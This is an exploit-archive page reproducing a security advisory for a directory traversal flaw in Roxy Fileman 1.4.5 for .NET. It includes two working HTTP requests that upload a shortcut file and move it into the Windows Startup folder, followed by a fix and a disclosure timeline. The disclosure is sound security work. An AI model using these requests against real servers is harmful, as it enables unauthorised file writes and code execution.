Menu

Search for hundreds of thousands of exploits

"Roxy Fileman 1.4.5 - Directory Traversal"

Author

Exploit author

"Patrik Lantz"

Platform

Exploit platform

aspx

Release date

Exploit published date

2019-12-16

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
# Exploit Title: Roxy Fileman 1.4.5 - Directory Traversal
# Author: Patrik Lantz
# Date: 2019-12-06
# Software: Roxy Fileman
# Version: 1.4.5
# Vendor Homepage: http://www.roxyfileman.com/
# Software Link: http://www.roxyfileman.com/download.php?f=1.4.5-net
# CVE: CVE-2019-19731

Tested on: ASP.NET 4.0.30319 and Microsoft-IIS 10.0, Windows 10 Pro Build 17134 
(using custom account as application pool identity for the IIS worker process).


===========================
Description
===========================
Roxy Fileman 1.4.5 for .NET is vulnerable to path traversal which can lead to file write in arbitrary locations depending on 
the IIS worker process privileges. 
This PoC demonstrates a crafted Windows shortcut file being uploaded and written to the Startup folder. The execution
of this file will be triggered on the next login.


Proof of Concept
===========================

It's possible to write an uploaded file to arbitrary locations using the RENAMEFILE action.
The RenameFile function in main.ashx does not check if the new file name 'name' is a valid location.
Moreover, the default conf.json has an incomplete blacklist for file extensions which in this case
allows Windows shortcut files to be uploaded, alternatively existing files can be renamed to include 
the .lnk extension.

1) Create a shortcut file

By using for example the target executable C:\Windows\System32\Calc.exe
Remove the .lnk extension and rename it to use the .dat extension.


2) Upload the file 

Either upload the .dat file manually via the Roxy Fileman web interface
or programmatically using a HTTP POST request. 

Details of the request:

POST /wwwroot/fileman/asp_net/main.ashx?a=UPLOAD HTTP/1.1
Host: 127.0.0.1:50357
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------159382831523528
Content-Length: 924
Origin: http://127.0.0.1:50357
Connection: close
Referer: http://127.0.0.1:50357/wwwroot/fileman/
Cookie: roxyld=%2Fwwwroot%2Ffileman%2FUploads%2Ftest2; roxyview=list

-----------------------------159382831523528
Content-Disposition: form-data; name="action"

upload
-----------------------------159382831523528
Content-Disposition: form-data; name="method"

ajax
-----------------------------159382831523528
Content-Disposition: form-data; name="d"

/wwwroot/fileman/Uploads/test2
-----------------------------159382831523528
Content-Disposition: form-data; name="files[]"; filename="poc.dat"
Content-Type: application/octet-stream

...data omitted...
-----------------------------159382831523528--



3) Write the file to the Startup folder using the RENAMEFILE action
The new filename is set via the n parameter. The correct path can be identified by trial and error depending 
on the location of wwwroot on the filesystem and the privileges for the IIS worker process (w3wp.exe).

If the necessary directories do not exist, they can be created using the CREATEDIR action which also
is vulnerable to path traversal.


POST /wwwroot/fileman/asp_net/main.ashx?a=RENAMEFILE&f=%2Fwwwroot%2Ffileman%2FUploads%2FDocuments%2Fpoc.dat&n=../../../../../../../../AppData/Roaming/Microsoft/Windows/Start%20Menu/Programs/Startup/poc.txt.lnk HTTP/1.1
Host: 127.0.0.1:50357
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 66
Origin: http://127.0.0.1:50357
Connection: close
Referer: http://127.0.0.1:50357/wwwroot/fileman/
Cookie: roxyld=%2Fwwwroot%2Ffileman%2FUploads%2Ftest2; roxyview=list

f=%2Fwwwroot%2Ffileman%2FUploads%2Ftest2%2Fpoc.dat&n=poc.dat



Workaround / Fix:
===========================

Patch the main.ashx code in order to perform checks for all paths that they are valid in the following actions: 
CREATEDIR, COPYFILE and RENAMEFILE.

Recommendations for users of Roxy Fileman:
  - Add lnk file extension to the conf.json under FORBIDDEN_UPLOADS, and aspx since it is not included in the blacklist by default.



Timeline
===========================
2019-12-06: Discovered the vulnerability
2019-12-06: Reported to the vendor (vendor is unresponsive)
2019-12-11: Request CVE
2019-12-13: Advisory published

Discovered By:
===========================
Patrik Lantz
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-11-06 "BlogEngine 3.3.8 - 'Content' Stored XSS" webapps aspx "Andrey Stoykov"
2020-08-17 "Microsoft SharePoint Server 2019 - Remote Code Execution" webapps aspx "West Shepherd"
2020-05-12 "Orchard Core RC1 - Persistent Cross-Site Scripting" webapps aspx SunCSR
2020-05-11 "Kartris 1.6 - Arbitrary File Upload" webapps aspx "Nhat Ha"
2020-02-24 "DotNetNuke 9.5 - Persistent Cross-Site Scripting" webapps aspx "Sajjad Pourali"
2020-02-24 "DotNetNuke 9.5 - File Upload Restrictions Bypass" webapps aspx "Sajjad Pourali"
2019-12-18 "Telerik UI - Remote Code Execution via Insecure Deserialization" webapps aspx "Bishop Fox"
2019-12-17 "NopCommerce 4.2.0 - Privilege Escalation" webapps aspx "Alessandro Magnosi"
2019-12-16 "Roxy Fileman 1.4.5 - Directory Traversal" webapps aspx "Patrik Lantz"
2019-11-12 "Adrenalin Core HCM 5.4.0 - 'prntDDLCntrlName' Reflected Cross-Site Scripting" webapps aspx Cy83rl0gger
Release Date Title Type Platform Author
2020-11-27 "libupnp 1.6.18 - Stack-based buffer overflow (DoS)" dos linux "Patrik Lantz"
2020-11-05 "TP-Link WDR4300 - Remote Code Execution (Authenticated)" remote hardware "Patrik Lantz"
2019-12-16 "Roxy Fileman 1.4.5 - Directory Traversal" webapps aspx "Patrik Lantz" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected